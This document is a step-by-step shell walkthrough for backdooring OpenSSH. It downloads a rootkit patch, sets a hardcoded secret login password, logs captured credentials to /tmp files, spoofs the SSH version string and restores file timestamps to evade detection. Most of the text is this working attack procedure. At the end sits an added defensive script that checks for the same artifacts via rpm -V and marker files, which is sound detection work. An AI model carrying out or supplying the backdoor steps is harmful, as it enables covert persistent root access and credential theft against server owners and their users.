I. Check the SSH version
[root@redkey vmshare]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
II. Download the SSH source package
Source package:
http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
Backdoor patch:
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
III. Back up the existing ssh configuration file
[root@redkey ~]# cp -p /etc/ssh/sshd_config{,.bak}
IV. Compile and install
[root@redkey vmshare]# tar -xzvf openssh-5.9p1.tar.gz
[root@redkey vmshare]# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
[root@redkey vmshare]# cd openssh-5.9p1.patch/
[root@redkey openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1
[root@redkey openssh-5.9p1.patch]# cd ../openssh-5.9p1
[root@redkey openssh-5.9p1]# patch < sshbd5.9p1.diff
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.h
Set the backdoor password to "redkey"
[root@redkey openssh-5.9p1]# vim includes.h
int secret_ok;
FILE *f;
#define ILOG "/tmp/ilog"
#define OLOG "/tmp/olog"
#define SECRETPW "redkey"
#endif /* INCLUDES_H */
Modify the version information (SSH_VERSION):
/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */
#define SSH_VERSION "OpenSSH_5.3p1"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
Compile & install
[root@redkey openssh-5.9p1]# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
[root@redkey openssh-5.9p1]# make
[root@redkey openssh-5.9p1]# make install
V. Restore the timestamp of the sshd_config file
[root@redkey ssh]# touch -r sshd_config.bak ssh_config
VI. Restart the service or reload the configuration
[root@redkey ssh]# service sshd reload
VII. Common problems
1. Packages that need to be installed
openssl openssl-devel pam-devel
2. Common compilation problems
Errors that may appear during compilation:
configure: error: *** zlib.h missing - please install first or check config.log
# yum install zlib-devel
configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) ***
# yum install openssl openssl-devel
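The procedure above leaves artifacts a defender can check for: files under /usr that no longer match the RPM database after make install, and the ILOG/OLOG paths defined in includes.h. The script below is an added example, not part of the original page; its function names and the --scan switch are hypothetical, and the package names passed to rpm -V assume an RPM-based host.

```shell
#!/bin/sh
# Added defensive example, not from the original page. Function names and the
# --scan switch are hypothetical; an RPM-based host is assumed.

# Log paths defined as ILOG/OLOG in the patched includes.h shown on this page.
MARKERS="/tmp/ilog /tmp/olog"

# has_backdoor_markers FILE
# Prints each marker string embedded in FILE; returns 0 if at least one is found.
has_backdoor_markers() {
    hit=1
    for m in $MARKERS; do
        if LC_ALL=C grep -q -F -e "$m" "$1" 2>/dev/null; then
            printf 'MARKER %s in %s\n' "$m" "$1"
            hit=0
        fi
    done
    return "$hit"
}

# dropped_logs ROOT
# Prints each ILOG/OLOG file present under ROOT ("/" for the live system, or
# the mount point of a disk image); returns 0 if at least one exists.
dropped_logs() {
    hit=1
    for m in $MARKERS; do
        if [ -e "${1%/}$m" ]; then
            printf 'LOGFILE %s\n' "${1%/}$m"
            hit=0
        fi
    done
    return "$hit"
}

# replaced_binaries
# Reads `rpm -V` output on stdin and prints non-config files whose digest no
# longer matches the package database ('5' in the third attribute column).
replaced_binaries() {
    awk '$1 ~ /^..5/ && $2 != "c" { print $NF }'
}

# Live triage: sh check_sshd.sh --scan
if [ "${1:-}" = "--scan" ]; then
    rpm -V openssh openssh-server openssh-clients 2>/dev/null | replaced_binaries
    for b in /usr/sbin/sshd /usr/bin/ssh; do has_backdoor_markers "$b"; done
    dropped_logs /
fi
```

The marker paths are only the values shown on this page and can be changed at build time, so treat the digest mismatch from rpm -V as the stronger signal. The digest check is also unaffected by the timestamp restore in step V.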